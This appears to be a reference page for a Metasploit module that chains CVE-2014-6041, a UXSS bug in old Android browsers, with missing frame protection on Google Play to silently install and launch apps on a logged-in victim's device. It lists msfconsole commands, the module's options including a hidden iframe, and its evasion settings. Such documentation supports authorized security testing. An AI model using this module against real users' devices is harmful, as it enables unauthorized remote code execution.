Android Browser RCE Through Google Play Store XFO - Metasploit


This page contains detailed information about how to use the auxiliary/admin/android/google_play_store_uxss_xframe_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
Source code: modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6041

This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, as any application available on the Google Play store can be installed and launched on the user's device. This module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use aapt dump badging /path/to/app.apk.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf auxiliary(google_play_store_uxss_xframe_rce) > exploit

Go back to menu.

Msfconsole Usage

Here is how the admin/android/google_play_store_uxss_xframe_rce auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/android/google_play_store_uxss_xframe_rce

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show info

       Name: Android Browser RCE Through Google Play Store XFO
     Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Rafay Baloch
  joev <[email protected]>

Available actions:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server

Check supported:
  No

Basic options:
  Name           Current Setting                Required  Description
  ----           ---------------                --------  -----------
  ACTIVITY_NAME  com.swlkr.rickrolld/.RickRoll  yes       The name of the activity in the apk to launch
  DETECT_LOGIN   true                           yes       Prevents the exploit from running if the user is not logged into Google
  HIDE_IFRAME    true                           yes       Hide the exploit iframe from the user
  PACKAGE_NAME   com.swlkr.rickrolld            yes       The package name of the app on the Google Play store you want to install
  SRVHOST        0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT        8080                           yes       The local port to listen on.
  SSL            false                          no        Negotiate SSL for incoming connections
  SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                                       no        The URI to use for this exploit (default is random)

Description:
  This module combines two vulnerabilities to achieve remote code 
  execution on affected Android devices. First, the module exploits 
  CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability 
  present in versions of Android's open source stock browser (the AOSP 
  Browser) prior to 4.4. Second, the Google Play store's web interface 
  fails to enforce a X-Frame-Options: DENY header (XFO) on some error 
  pages, and therefore, can be targeted for script injection. As a 
  result, this leads to remote code execution through Google Play's 
  remote installation feature, as any application available on the 
  Google Play store can be installed and launched on the user's 
  device. This module requires that the user is logged into Google 
  with a vulnerable browser. To list the activities in an APK, you can 
  use `aapt dump badging /path/to/app.apk`.

References:
  https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
  http://1337day.com/exploit/description/22581
  OSVDB (110664)
  https://nvd.nist.gov/vuln/detail/CVE-2014-6041

Module Options

This is a complete list of options available in the admin/android/google_play_store_uxss_xframe_rce auxiliary module:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show options

Module options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):

   Name           Current Setting                Required  Description
   ----           ---------------                --------  -----------
   ACTIVITY_NAME  com.swlkr.rickrolld/.RickRoll  yes       The name of the activity in the apk to launch
   DETECT_LOGIN   true                           yes       Prevents the exploit from running if the user is not logged into Google
   HIDE_IFRAME    true                           yes       Hide the exploit iframe from the user
   PACKAGE_NAME   com.swlkr.rickrolld            yes       The package name of the app on the Google Play store you want to install
   SRVHOST        0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080                           yes       The local port to listen on.
   SSL            false                          no        Negotiate SSL for incoming connections
   SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                       no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Advanced Options

Here is a complete list of advanced options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show advanced

Module advanced options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ListenerComm                     no        The specific communication channel to use for this service
   SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression  false            no        Enable SSL/TLS-level compression
   SendRobots      false            no        Return a robots.txt file if asked for one
   URIHOST                          no        Host to use in URI (useful for tunnels)
   URIPORT                          no        Port to use in URI (useful for tunnels)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/android/google_play_store_uxss_xframe_rce module can do:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show actions

Auxiliary actions:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Evasion Options

Here is the full list of possible evasion options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Rafay Baloch
  • joev

Version

This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.